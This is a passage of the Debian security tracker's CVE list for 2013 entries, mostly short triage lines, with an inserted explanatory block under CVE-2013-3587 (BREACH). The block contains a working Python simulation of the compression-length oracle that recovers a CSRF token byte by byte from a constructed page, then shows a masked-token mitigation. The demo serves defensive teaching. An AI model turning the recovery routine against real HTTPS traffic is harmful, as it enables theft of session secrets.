CVE-2013-3620 (Hardcoded WSMan credentials in Intelligent Platform Management Interfa ...)
	NOT-FOR-US: Supermicro
CVE-2013-3619 (Intelligent Platform Management Interface (IPMI) with firmware for Sup ...)
	NOT-FOR-US: Supermicro
CVE-2013-3618
	RESERVED
CVE-2013-3617 (The XML API in Openbravo ERP 2.5, 3.0, and earlier allows remote authe ...)
	NOT-FOR-US: Openbravo ERP
CVE-2013-3616 (Cross-site scripting (XSS) vulnerability in the KnowledgeView Editoria ...)
NOT-FOR-US: KnowledgeView Editorial and Management application CVE-2013-3615 (Dahua DVR appliances use a password-hash algorithm with a short hash l ...) NOT-FOR-US: Dahua DVR CVE-2013-3614 (Dahua DVR appliances have a small value for the maximum password lengt ...) NOT-FOR-US: Dahua DVR CVE-2013-3613 (Dahua DVR appliances do not properly restrict UPnP requests, which mak ...) NOT-FOR-US: Dahua DVR CVE-2013-3612 (Dahua DVR appliances have a hardcoded password for (1) the root accoun ...) NOT-FOR-US: Dahua DVR CVE-2013-3611 REJECTED CVE-2013-3610 (qis/QIS_finish.htm on the ASUS RT-N10E router with firmware before 2.0 ...) NOT-FOR-US: ASUS router CVE-2013-3609 (The web interface in the Intelligent Platform Management Interface (IP ...) NOT-FOR-US: Intelligent Platform Management Interface CVE-2013-3608 (The web interface in the Intelligent Platform Management Interface (IP ...) NOT-FOR-US: Intelligent Platform Management Interface CVE-2013-3607 (Multiple stack-based buffer overflows in the web interface in the Inte ...) NOT-FOR-US: Intelligent Platform Management Interface CVE-2013-3606 (The login page in the GoAhead web server on Dell PowerConnect 3348 1.2 ...) NOT-FOR-US: GoAhead web server on Dell PowerConnect CVE-2013-3605 (Cross-site request forgery (CSRF) vulnerability in Coursemill Learning ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-3604 (Multiple cross-site scripting (XSS) vulnerabilities in Coursemill Lear ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-3603 (Cross-site scripting (XSS) vulnerability in Coursemill Learning Manage ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-3602 (SQL injection vulnerability in admindocumentworker.jsp in Coursemill L ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-3601 (Coursemill Learning Management System (LMS) 6.6 does not properly rest ...) 
NOT-FOR-US: Coursemill Learning Management System CVE-2013-3600 (Coursemill Learning Management System (LMS) 6.6 allows remote authenti ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-3599 (userlogin.jsp in Coursemill Learning Management System (LMS) 6.6 and 6 ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-3598 (Directory traversal vulnerability in servlet/CreateTemplateServlet in ...) NOT-FOR-US: SearchBlox CVE-2013-3597 (servlet/CollectionListServlet in SearchBlox before 7.5 build 1 allows ...) NOT-FOR-US: SearchBlox CVE-2013-3596 (AdvancePro Advanceware allows remote authenticated users to obtain sen ...) NOT-FOR-US: AdvancePro Advanceware CVE-2013-3595 (The OpenManage web application 2.5 build 1.19 on Dell PowerConnect 334 ...) NOT-FOR-US: Dell PowerConnect CVE-2013-3594 (The SSH service on Dell PowerConnect 3348 1.2.1.3, 3524p 2.0.0.48, and ...) NOT-FOR-US: Dell PowerConnect CVE-2013-3593 (Baramundi Management Suite 7.5 through 8.9 uses cleartext for (1) clie ...) NOT-FOR-US: Baramundi Management Suite CVE-2013-3592 RESERVED CVE-2013-3591 (vTiger CRM 5.3 and 5.4: 'files' Upload Folder Arbitrary PHP Code Execu ...) NOT-FOR-US: vTiger CRM CVE-2013-3590 (Unrestricted file upload vulnerability in admin/uploadImage.html in Se ...) NOT-FOR-US: SearchBlox CVE-2013-3589 (Cross-site scripting (XSS) vulnerability in the login page in the Admi ...) NOT-FOR-US: Dell iDRAC6 CVE-2013-3588 (The web management interface on Zyxel P660 devices allows remote attac ...) NOT-FOR-US: Zyxel CVE-2013-3587 (The HTTPS protocol, as used in unspecified web applications, can encry ...) 
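CVE-2013-3587 just above is BREACH: when an HTTPS response is compressed as a whole and contains both a secret (a CSRF token, say) and text the attacker controls, the compressed length tells the attacker whether a guess matched the secret, one byte at a time. The tracker's notes on this entry say the mitigation has to live in the web application. The following is an added example, not code from the tracker or from any project the entry references: it simulates the size oracle against a constructed page with a constructed token and alphabet, then applies the per-response token mask that Django adopted in response. The page template, the `value='` prefix, the padding trick used to read lengths to the bit and the fixed-Huffman setting are the demo's own assumptions; against dynamic-Huffman DEFLATE a real attacker needs more probes and some statistics.

```python
"""BREACH compression-oracle demo with the Django-style masked-token mitigation.

Added example for CVE-2013-3587; not code from the Debian tracker or any
project. The page template, token, alphabet, padding trick and fixed-Huffman
setting are constructed for the demo.
"""
import os
import zlib
from typing import Callable

SECRET = "7f3a9c1e2b"           # constructed CSRF token the attacker wants
ALPHABET = "0123456789abcdef"   # token alphabet the attacker assumes
PREFIX = "value='"              # bytes assumed to precede the token in the page


def render(token: str, reflected: str) -> bytes:
    """Constructed response: a hidden form token and attacker-chosen text
    (e.g. a search string) in one body that the server compresses as a whole."""
    return (
        "<html><body>"
        f"<input type='hidden' name='csrftoken' value='{token}'>"
        f"<p>Results for: {reflected}</p>"
        "</body></html>"
    ).encode()


def deflate_len(body: bytes) -> int:
    """Compressed size in bytes, which is what a passive observer of the TLS
    records sees. Fixed Huffman codes keep the demo deterministic; with
    dynamic Huffman blocks the attacker needs more probes and statistics."""
    c = zlib.compressobj(level=6, strategy=zlib.Z_FIXED)
    return len(c.compress(body) + c.flush())


def bit_score(page_for: Callable[[str], bytes], reflected: str) -> int:
    """Sum of compressed sizes over eight probes that append 0..7 distinct
    padding bytes >= 0x90. Each such byte costs exactly 9 bits as a
    fixed-Huffman literal and never forms an LZ77 match, so the sum tracks
    the body's bit length: byte alignment can no longer hide the one-literal
    (7 or 8 bit) difference between a right and a wrong guess."""
    return sum(
        deflate_len(page_for(reflected) + bytes(range(0x90, 0x90 + k)))
        for k in range(8)
    )


def recover(page_for: Callable[[str], bytes], length: int) -> str:
    """Byte-at-a-time BREACH: the guess that extends the LZ77 match against
    the secret is absorbed into the match instead of costing a literal."""
    known = ""
    for _ in range(length):
        known += min(ALPHABET, key=lambda c: bit_score(page_for, PREFIX + known + c))
    return known


def mask_token(secret: str) -> str:
    """Mitigation (the scheme Django adopted for its CSRF token): send
    mask || (secret XOR mask) with a fresh random mask on every response.
    The bytes on the page change each time, so a guess cannot match them."""
    raw = secret.encode()
    mask = os.urandom(len(raw))
    return (mask + bytes(a ^ b for a, b in zip(raw, mask))).hex()


def unmask_token(masked_hex: str) -> str:
    """Server side: recover the secret from a submitted masked token."""
    raw = bytes.fromhex(masked_hex)
    half = len(raw) // 2
    return bytes(a ^ b for a, b in zip(raw[:half], raw[half:])).decode()


def vulnerable_page(reflected: str) -> bytes:
    return render(SECRET, reflected)


def mitigated_page(reflected: str) -> bytes:
    return render(mask_token(SECRET), reflected)   # fresh mask on every response


if __name__ == "__main__":
    print("plain token: ", recover(vulnerable_page, len(SECRET)))  # 7f3a9c1e2b
    print("masked token:", recover(mitigated_page, len(SECRET)))   # unrelated to the secret
```

The masked page still contains a token the oracle can read, but it is a different token in every response, so what the attacker learns is useless for the next request; the server unmasks whatever it receives and compares the underlying secret. The other mitigations the linked references describe (not compressing responses that mix secrets with reflected input, or not reflecting input at all) remove the oracle entirely rather than randomising what it sees.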
	NOTE: not something we can concretely fix somewhere
	NOTE: mitigations must be done in webapps
	NOTE: http://web.archive.org/web/20160304210825/http://breachattack.com/
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=995168
	NOTE: https://www.djangoproject.com/weblog/2013/aug/06/breach-and-django/
	NOTE: https://www.mail-archive.com/dev@httpd.apache.org/msg57592.html
CVE-2013-3586 (Samsung Web Viewer for Samsung DVR devices allows remote attackers to ...)
	NOT-FOR-US: Samsung DVR devices
CVE-2013-3585 (Samsung Web Viewer for Samsung DVR devices stores credentials in clear ...)
	NOT-FOR-US: Samsung DVR devices
CVE-2013-3584 (Cross-site scripting (XSS) vulnerability in Corporater EPM Suite allow ...)
	NOT-FOR-US: Corporater EPM Suite
CVE-2013-3583 (Cross-site request forgery (CSRF) vulnerability in saveProperties.html ...)
	NOT-FOR-US: Corporater EPM Suite
CVE-2013-3582 (Buffer overflow in Dell BIOS on Dell Latitude D###, E####, XT2, and Z6 ...)
	NOT-FOR-US: Dell
CVE-2013-3581 (ajax.cgi in the web interface on the Choice Wireless Green Packet WIXF ...)
	NOT-FOR-US: Choice Wireless Green Packet WIXFMR-111 4G WiMax modem
CVE-2013-3580 (The TrustGo Antivirus & Mobile Security application before 1.3.6 f ...)
	NOT-FOR-US: TrustGo
CVE-2013-3579 (The Lookout Mobile Security application before 8.17-8a39d3f for Androi ...)
	NOT-FOR-US: Lookout Mobile Security application for Android
CVE-2013-3578 (SQL injection vulnerability in the Help Desk application in Wave EMBAS ...)
	NOT-FOR-US: ERAS
CVE-2013-3577 (SQL injection vulnerability in the Help Desk application in Wave EMBAS ...)
	NOT-FOR-US: ERAS
CVE-2013-3576 (ginkgosnmp.inc in HP System Management Homepage (SMH) allows remote au ...)
	NOT-FOR-US: HP System Management Homepage
CVE-2013-3575 (hpdiags/frontend2/help/pageview.php in HP Insight Diagnostics 9.4.0.47 ...)
	NOT-FOR-US: HP Insight Diagnostics
CVE-2013-3574 (Absolute path traversal vulnerability in hpdiags/frontend2/commands/sa ...)
	NOT-FOR-US: HP Insight Diagnostics
CVE-2013-3573 (HP Insight Diagnostics 9.4.0.4710 allows remote attackers to conduct u ...)
	NOT-FOR-US: HP Insight Diagnostics
CVE-2013-3572 (Cross-site scripting (XSS) vulnerability in the administer interface i ...)
	NOT-FOR-US: Ubiquiti Networks UniFi
CVE-2013-3571 (socat 1.2.0.0 before 1.7.2.2 and 2.0.0-b1 before 2.0.0-b6, when used f ...)
	- socat 1.7.1.3-1.5 (low; bug #709931)
	[squeeze] - socat (Minor issue)
	[wheezy] - socat (Minor issue)
	NOTE: http://www.dest-unreach.org/socat/contrib/socat-secadv4.html
CVE-2013-3570
	RESERVED
CVE-2013-3569
	RESERVED
CVE-2013-3568 (Cross-site request forgery (CSRF) vulnerability in Cisco Linksys WRT11 ...)
	NOT-FOR-US: Cisco
CVE-2013-3567 (Puppet 2.7.x before 2.7.22 and 3.2.x before 3.2.2, and Puppet Enterpri ...)
	{DSA-2715-1}
	- puppet 3.2.2-1 (bug #712745)
CVE-2013-3566
	RESERVED
CVE-2013-3565 (Multiple cross-site scripting (XSS) vulnerabilities in the HTTP Interf ...)
	- vlc 2.0.7-1 (unimportant)
	NOTE: Negligible impact
CVE-2013-3564 (The web interface in VideoLAN VLC media player before 2.0.7 has no acc ...)
	- vlc 2.0.7-1
	NOTE: https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18864
CVE-2013-3563 (Stack-based buffer overflow in db_netserver in Lianja SQL Server befor ...)
	NOT-FOR-US: Lianja SQL Server
CVE-2013-3562 (Multiple integer signedness errors in the tvb_unmasked function in epa ...)
	{DSA-2700-1}
	- wireshark 1.8.7-1 (bug #709167)
	[squeeze] - wireshark (Only affects 1.8.x)
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8499
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-29.html
CVE-2013-3561 (Multiple integer overflows in Wireshark 1.8.x before 1.8.7 allow remot ...)
	- wireshark (This CVE ID is for the Wireshark trunk; the fix for the 1.8.x branch is tracked as CVE-2013-3562)
CVE-2013-3560 (The dissect_dsmcc_un_download function in epan/dissectors/packet-mpeg- ...)
{DSA-2700-1} - wireshark 1.8.7-1 (unimportant; bug #709167) [squeeze] - wireshark (Only affects 1.8.x) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-28.html NOTE: Not suitable for code injection CVE-2013-3559 (epan/dissectors/packet-dcp-etsi.c in the DCP ETSI dissector in Wiresha ...) {DSA-2700-1} - wireshark 1.8.7-1 (bug #709167) [squeeze] - wireshark (Only affects 1.8.x) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-27.html CVE-2013-3558 (The dissect_ccp_bsdcomp_opt function in epan/dissectors/packet-ppp.c i ...) {DSA-2700-1} - wireshark 1.8.7-1 (bug #709167) [squeeze] - wireshark (Only affects 1.8.x) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-26.html CVE-2013-3557 (The dissect_ber_choice function in epan/dissectors/packet-ber.c in the ...) {DSA-2700-1} - wireshark 1.8.7-1 (unimportant; bug #709167) [squeeze] - wireshark 1.2.11-6+squeeze11 NOTE: Not suitable for code injection CVE-2013-3556 (The fragment_add_seq_common function in epan/reassemble.c in the ASN.1 ...) - wireshark (Only affected the dev trunk) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-25.html (r48943) CVE-2013-3555 (epan/dissectors/packet-gtpv2.c in the GTPv2 dissector in Wireshark 1.8 ...) {DSA-2700-1} - wireshark 1.8.7-1 (bug #709167) [squeeze] - wireshark (Only affects 1.8.x) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-24.html CVE-2013-3554 RESERVED CVE-2013-3553 (Nitro Pro 7.5.0.22 and earlier and Nitro Reader 2.5.0.36 and earlier a ...) NOT-FOR-US: Nitro Pro CVE-2013-3552 (Nitro Pro 7.5.0.29 and earlier and Nitro Reader 2.5.0.45 and earlier a ...) NOT-FOR-US: Nitro Pro CVE-2013-3551 (Kernel/Modules/AgentTicketPhone.pm in Open Ticket Request System (OTRS ...) 
{DSA-2696-1} - otrs2 3.2.7-1 [squeeze] - otrs2 CVE-2013-3550 REJECTED CVE-2013-3549 RESERVED CVE-2013-3548 RESERVED CVE-2013-3547 RESERVED CVE-2013-3546 RESERVED CVE-2013-3545 RESERVED CVE-2013-3544 REJECTED CVE-2013-3543 (The AXIS Media Control (AMC) ActiveX control (AxisMediaControlEmb.dll) ...) NOT-FOR-US: AXIS Media Control CVE-2013-3542 (Grandstream GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV ...) NOT-FOR-US: Grandstream CVE-2013-3541 (Directory traversal vulnerability in cgi-bin/admin/fileread in AirLive ...) NOT-FOR-US: AirLive CVE-2013-3540 (Cross-site request forgery (CSRF) vulnerability in cgi-bin/admin/usrgr ...) NOT-FOR-US: AirLive CVE-2013-3539 (Cross-site request forgery (CSRF) vulnerability in the command/user.cg ...) NOT-FOR-US: Sony CVE-2013-3538 (Multiple cross-site scripting (XSS) vulnerabilities in todooforum.php ...) NOT-FOR-US: Todoo Forum CVE-2013-3537 (Multiple SQL injection vulnerabilities in todooforum.php in Todoo Foru ...) NOT-FOR-US: Todoo Forum CVE-2013-3536 (SQL injection vulnerability in the gp_LoadUserFromHash function in fun ...) NOT-FOR-US: grouppay plugin CVE-2013-3535 (Multiple cross-site scripting (XSS) vulnerabilities in CMSLogik 1.2.0 ...) NOT-FOR-US: CMSLogik CVE-2013-3534 (Cross-site scripting (XSS) vulnerability in the aiContactSafe componen ...) NOT-FOR-US: aiContactSafe CVE-2013-3533 (Multiple SQL injection vulnerabilities in Virtual Access Monitor 3.10. ...) NOT-FOR-US: Virtual Access Monitor CVE-2013-3532 (SQL injection vulnerability in settings.php in the Web Dorado Spider V ...) NOT-FOR-US: WordPress plugin CVE-2013-3531 (SQL injection vulnerability in meneger.php in RadioCMS 2.2 allows remo ...) NOT-FOR-US: RadioCMS CVE-2013-3530 (SQL injection vulnerability in playlist.php in the Spiffy XSPF Player ...) NOT-FOR-US: WordPress plugin CVE-2013-3529 (Multiple cross-site scripting (XSS) vulnerabilities in user/obits.php ...) 
NOT-FOR-US: WordPress plugin CVE-2013-3528 (Unspecified vulnerability in the update check in Vanilla Forums before ...) NOT-FOR-US: Vanilla Forums CVE-2013-3527 (Multiple SQL injection vulnerabilities in Vanilla Forums before 2.0.18 ...) NOT-FOR-US: Vanilla Forums CVE-2013-3526 (Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the ...) NOT-FOR-US: WordPress plugin CVE-2013-3525 NOTE: http://web.archive.org/web/20151225141212/http://blog.bestpractical.com/2013/04/on-our-security-policies.html CVE-2013-3524 (SQL injection vulnerability in popupnewsitem/ in the Pop Up News modul ...) NOT-FOR-US: phpVMS CVE-2013-3523 (SQL injection vulnerability in This HTML Is Simple (THIS) before 1.2.4 ...) NOT-FOR-US: This HTML Is Simple CVE-2013-3522 (SQL injection vulnerability in index.php/ajax/api/reputation/vote in v ...) NOT-FOR-US: vBulletin CVE-2013-3521 REJECTED CVE-2013-3520 (VMware vCenter Chargeback Manager (aka CBM) before 2.5.1 does not prop ...) NOT-FOR-US: VMware vCenter Chargeback Manager CVE-2013-3519 (lgtosync.sys in VMware Workstation 9.x before 9.0.3, VMware Player 5.x ...) NOT-FOR-US: VMware CVE-2013-3518 RESERVED CVE-2013-3517 (Cross-site scripting (XSS) vulnerability in NETGEAR WNR3500U and WNR35 ...) NOT-FOR-US: NETGEAR CVE-2013-3516 (NETGEAR WNR3500U and WNR3500L routers uses form tokens abased solely o ...) NOT-FOR-US: NETGEAR CVE-2013-3515 (Multiple cross-site scripting (XSS) vulnerabilities in OpenX Source 2. ...) NOT-FOR-US: OpenX CVE-2013-3514 (Multiple directory traversal vulnerabilities in OpenX before 2.8.10 re ...) NOT-FOR-US: OpenX CVE-2013-3513 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Noma ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3512 (The Cacti component in GroundWork Monitor Enterprise 6.7.0 does not pr ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3511 (Open redirect vulnerability in the NeDi component in GroundWork Monito ...) 
NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3510 (Multiple SQL injection vulnerabilities in GroundWork Monitor Enterpris ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3509 (html/System-NeDi.php in the NeDi component in GroundWork Monitor Enter ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3508 (html/System-Files.php in the System File Overview feature in the NeDi ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3507 (The NeDi component in GroundWork Monitor Enterprise 6.7.0 allows remot ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3506 (cgi-bin/performance/perfchart.cgi in the Performance component in Grou ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3505 (The Nagios-App component in GroundWork Monitor Enterprise 6.7.0 allows ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3504 (Directory traversal vulnerability in monarch.cgi in the MONARCH compon ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3503 (The Profile Importer feature in monarch.cgi in the MONARCH component i ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3502 (monarch_scan.cgi in the MONARCH component in GroundWork Monitor Enterp ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3501 (Multiple cross-site scripting (XSS) vulnerabilities in GroundWork Moni ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3500 (The Foundation webapp admin interface in GroundWork Monitor Enterprise ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3499 (GroundWork Monitor Enterprise 6.7.0 performs authentication on the bas ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3498 (Cross-site scripting (XSS) vulnerability in Juniper SmartPass WLAN Sec ...) NOT-FOR-US: Juniper CVE-2013-3497 (Juniper Junos Space before 12.3P2.8, as used on the JA1500 appliance a ...) NOT-FOR-US: Juniper CVE-2013-3496 (Infotecs ViPNet Client 3.2.10 (15632) and earlier, ViPNet Coordinator ...) 
	NOT-FOR-US: Infotecs ViPNet Client
CVE-2013-3495 (The Intel VT-d Interrupt Remapping engine in Xen 3.3.x through 4.3.x a ...)
	- xen 4.4.1-3 (unimportant)
	NOTE: Hardware design flaw, no software solution
CVE-2013-3494 (A Code Execution Vulnerability exists in UMPlayer 0.98 in wintab32.dll ...)
	NOT-FOR-US: UMPlayer
CVE-2013-3493 (XnView 2.03 has an integer overflow vulnerability ...)
	NOT-FOR-US: XnView
CVE-2013-3492 (XnView 2.03 has a stack-based buffer overflow vulnerability ...)
	NOT-FOR-US: XnView
CVE-2013-3491 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Shar ...)
	NOT-FOR-US: WordPress plugin sharebar
CVE-2013-3490
	RESERVED
CVE-2013-3489 (Buffer overflow in Media Player Classic - Home Cinema (MPC-HC) before ...)
	NOT-FOR-US: Media Player Classic - Home Cinema (MPC-HC)
CVE-2013-3488 (Stack-based buffer overflow in Media Player Classic - Home Cinema (MPC ...)
	NOT-FOR-US: Media Player Classic - Home Cinema (MPC-HC)
CVE-2013-3487 (Multiple cross-site scripting (XSS) vulnerabilities in the security lo ...)
	NOT-FOR-US: BulletProof Security plugin for WordPress
CVE-2013-3486 (IrfanView FlashPix Plugin 4.3.4 0 has an Integer Overflow Vulnerabilit ...)
	NOT-FOR-US: IrfanView FlashPix Plugin
CVE-2013-3485 (Multiple untrusted search path vulnerabilities in Soda PDF 5.1.183.105 ...)
	NOT-FOR-US: Soda PDF
CVE-2013-3484 (Multiple cross-site scripting (XSS) vulnerabilities in dotCMS before 2 ...)
	NOT-FOR-US: dotCMS
CVE-2013-3483 (Stack-based buffer overflow in ermapper_u.dll in Intergraph ERDAS ER V ...)
	NOT-FOR-US: Intergraph ERDAS ER Viewer
CVE-2013-3482 (Stack-based buffer overflow in the rf_report_error function in ermappe ...)
	NOT-FOR-US: Intergraph ERDAS ER Viewer
CVE-2013-3481 (Stack-based buffer overflow in Artweaver Plus and Free before 3.1.5 al ...)
	NOT-FOR-US: Artweaver
CVE-2013-3480 (Integer overflow in Sagelight 4.4 and earlier allows remote attackers ...)
	NOT-FOR-US: Sagelight
CVE-2013-3479 (Cross-site request forgery (CSRF) vulnerability in the ShareThis plugi ...)
NOT-FOR-US: WordPress plugin ShareThis CVE-2013-3478 (SQL injection vulnerability in Apptha WordPress Video Gallery 2.0, 1.6 ...) NOT-FOR-US: Apptha WordPress Video Gallery CVE-2013-3477 (Cross-site request forgery (CSRF) vulnerability in the Related Posts b ...) NOT-FOR-US: WordPress plugin related-posts-by-zemanta CVE-2013-3476 (Cross-site request forgery (CSRF) vulnerability in the WordPress Relat ...) NOT-FOR-US: WordPress plugin wordpress-23-related-posts-plugin CVE-2013-3475 (Stack-based buffer overflow in db2aud in the Audit Facility in IBM DB2 ...) NOT-FOR-US: IBM CVE-2013-3474 (The Web Administrator Interface on Cisco Wireless LAN Controller (WLC) ...) NOT-FOR-US: Cisco CVE-2013-3473 (The web framework in Cisco Prime Central for Hosted Collaboration Solu ...) NOT-FOR-US: Cisco CVE-2013-3472 (Cross-site request forgery (CSRF) vulnerability in the Enterprise Lice ...) NOT-FOR-US: Cisco CVE-2013-3471 (The captive portal application in Cisco Identity Services Engine (ISE) ...) NOT-FOR-US: Cisco CVE-2013-3470 (The RIP process in Cisco IOS XR allows remote attackers to cause a den ...) NOT-FOR-US: Cisco IOS XR CVE-2013-3469 (Cisco Mobility Services Engine does not properly set up the Oracle SSL ...) NOT-FOR-US: Cisco CVE-2013-3468 (The Cisco Unified IP Phone 8945 with software 9.3(2) allows remote att ...) NOT-FOR-US: Cisco CVE-2013-3467 (Memory leak in the CLI component on Cisco Unified Computing System (UC ...) NOT-FOR-US: Cisco CVE-2013-3466 (The EAP-FAST authentication module in Cisco Secure Access Control Serv ...) NOT-FOR-US: Cisco CVE-2013-3465 RESERVED CVE-2013-3464 (Cisco IOS XR allows local users to cause a denial of service (Silicon ...) NOT-FOR-US: Cisco IOS XR CVE-2013-3463 (The protocol-inspection feature on Cisco Adaptive Security Appliances ...) NOT-FOR-US: Cisco CVE-2013-3462 (Buffer overflow in Cisco Unified Communications Manager (Unified CM) 7 ...) 
NOT-FOR-US: Cisco CVE-2013-3461 (Cisco Unified Communications Manager (Unified CM) 8.5(x) and 8.6(x) be ...) NOT-FOR-US: Cisco CVE-2013-3460 (Memory leak in Cisco Unified Communications Manager (Unified CM) 8.5(x ...) NOT-FOR-US: Cisco CVE-2013-3459 (Cisco Unified Communications Manager (Unified CM) 7.1(x) before 7.1(5b ...) NOT-FOR-US: Cisco CVE-2013-3458 (Cisco Adaptive Security Appliances (ASA) devices, when SMP is used, do ...) NOT-FOR-US: Cisco Adaptive Security Appliances CVE-2013-3457 (Absolute path traversal vulnerability in the web interface in Cisco Fi ...) NOT-FOR-US: Cisco Finesse CVE-2013-3456 RESERVED CVE-2013-3455 (Cisco Finesse allows remote attackers to obtain sensitive information ...) NOT-FOR-US: Cisco CVE-2013-3454 (Cisco TelePresence System Software 1.10.1 and earlier on 500, 13X0, 1X ...) NOT-FOR-US: Cisco CVE-2013-3453 (Memory leak in Cisco Unified Communications Manager IM and Presence Se ...) NOT-FOR-US: Cisco CVE-2013-3452 RESERVED CVE-2013-3451 (Multiple cross-site request forgery (CSRF) vulnerabilities in Cisco Un ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-3450 (Cross-site request forgery (CSRF) vulnerability in the User WebDialer ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-3449 RESERVED CVE-2013-3448 (Cisco WebEx Meetings Server does not check whether a user account is a ...) NOT-FOR-US: Cisco CVE-2013-3447 RESERVED CVE-2013-3446 (Open redirect vulnerability in the login page in Cisco Digital Media M ...) NOT-FOR-US: Cisco CVE-2013-3445 (The firewall subsystem in Cisco Identity Services Engine has an incorr ...) NOT-FOR-US: Cisco Identity Services Engine CVE-2013-3444 (The web framework in Cisco WAAS Software before 4.x and 5.x before 5.0 ...) NOT-FOR-US: Cisco CVE-2013-3443 (The web service framework in Cisco WAAS Software 4.x and 5.x before 5. ...) NOT-FOR-US: Cisco CVE-2013-3442 (The web portal in Cisco Unified Communications Manager (Unified CM) al ...) 
	NOT-FOR-US: Cisco Unified Communications Manager
CVE-2013-3441 (Cisco Aironet 3600 access points allow remote attackers to cause a den ...)
	NOT-FOR-US: Cisco
CVE-2013-3440 (Multiple cross-site scripting (XSS) vulnerabilities in the administrat ...)
	NOT-FOR-US: Cisco
CVE-2013-3439 (Cross-site scripting (XSS) vulnerability in Cisco Unified Operations M ...)
	NOT-FOR-US: Cisco
CVE-2013-3438 (The web framework in the server in Cisco Unified MeetingPlace Web Conf ...)
	NOT-FOR-US: Cisco
CVE-2013-3437 (SQL injection vulnerability in the management application in Cisco Uni ...)
	NOT-FOR-US: Cisco
CVE-2013-3436 (The default configuration of the Group Encrypted Transport VPN (GET VP ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-3435 (The Cisco Unified IP Conference Station 7937G allows remote attackers ...)
	NOT-FOR-US: Cisco
CVE-2013-3434 (Untrusted search path vulnerability in Cisco Unified Communications Ma ...)
	NOT-FOR-US: Cisco
CVE-2013-3433 (Untrusted search path vulnerability in Cisco Unified Communications Ma ...)
	NOT-FOR-US: Cisco
CVE-2013-3432
	RESERVED
CVE-2013-3431 (Cisco Video Surveillance Manager (VSM) before 7.0.0 does not require a ...)
	NOT-FOR-US: Cisco
CVE-2013-3430 (Cisco Video Surveillance Manager (VSM) before 7.0.0 allows remote atta ...)
	NOT-FOR-US: Cisco
CVE-2013-3429 (Multiple directory traversal vulnerabilities in Cisco Video Surveillan ...)
	NOT-FOR-US: Cisco
CVE-2013-3428 (The web interface in Cisco Secure Access Control System (ACS) does not ...)
	NOT-FOR-US: Cisco
CVE-2013-3427
	RESERVED
CVE-2013-3426 (The Serviceability servlet on Cisco 9900 IP phones does not properly r ...)
	NOT-FOR-US: Cisco
CVE-2013-3425 (The Meeting Center component in Cisco WebEx 11 generates different err ...)
	NOT-FOR-US: Cisco WebEx 11
CVE-2013-3424 (Cross-site request forgery (CSRF) vulnerability in Administration and ...)
	NOT-FOR-US: Cisco
CVE-2013-3423 (Cross-site scripting (XSS) vulnerability in the web interface in Cisco ...)
	NOT-FOR-US: Cisco
CVE-2013-3422 (Cross-site scripting (XSS) vulnerability in Administration pages in Ci ...)
	NOT-FOR-US: Cisco
CVE-2013-3421 (Cross-site scripting (XSS) vulnerability in the Help index page in Cis ...)
	NOT-FOR-US: Cisco
CVE-2013-3420 (Cross-site request forgery (CSRF) vulnerability in the web framework o ...)
	NOT-FOR-US: Cisco Identity Services Engine
CVE-2013-3419 (Cross-site scripting (XSS) vulnerability in Cisco Unified MeetingPlace ...)
	NOT-FOR-US: Cisco
CVE-2013-3418 (Cisco Unified Communications Domain Manager does not properly allocate ...)
	NOT-FOR-US: Cisco
CVE-2013-3417 (The administrative web interface in Cisco Video Surveillance Operation ...)
	NOT-FOR-US: Cisco
CVE-2013-3416 (Cross-site scripting (XSS) vulnerability in the web framework in the u ...)
	NOT-FOR-US: Cisco
CVE-2013-3415 (Cisco Adaptive Security Appliance (ASA) Software 8.4.x before 8.4(3) a ...)
	NOT-FOR-US: Cisco Adaptive Security Appliance
CVE-2013-3414 (Cross-site scripting (XSS) vulnerability in the WebVPN portal login pa ...)
	NOT-FOR-US: Cisco
CVE-2013-3413 (Cross-site scripting (XSS) vulnerability in the search form in the adm ...)
	NOT-FOR-US: Cisco
CVE-2013-3412 (SQL injection vulnerability in Cisco Unified Communications Manager (C ...)
	NOT-FOR-US: Cisco
CVE-2013-3411 (The IDSM-2 drivers in Cisco Intrusion Prevention System (IPS) Software ...)
	NOT-FOR-US: Cisco
CVE-2013-3410 (Cisco Intrusion Prevention System (IPS) Software on IPS NME devices be ...)
	NOT-FOR-US: Cisco
CVE-2013-3409 (The portal in Cisco Prime Central for Hosted Collaboration Solution (H ...)
	NOT-FOR-US: Cisco
CVE-2013-3408 (The firmware on Cisco Virtualization Experience Client 6000 devices se ...)
	NOT-FOR-US: Cisco
CVE-2013-3407 (The web interface in Cisco Server Provisioner 6.4.0 Patch 5-1301292331 ...)
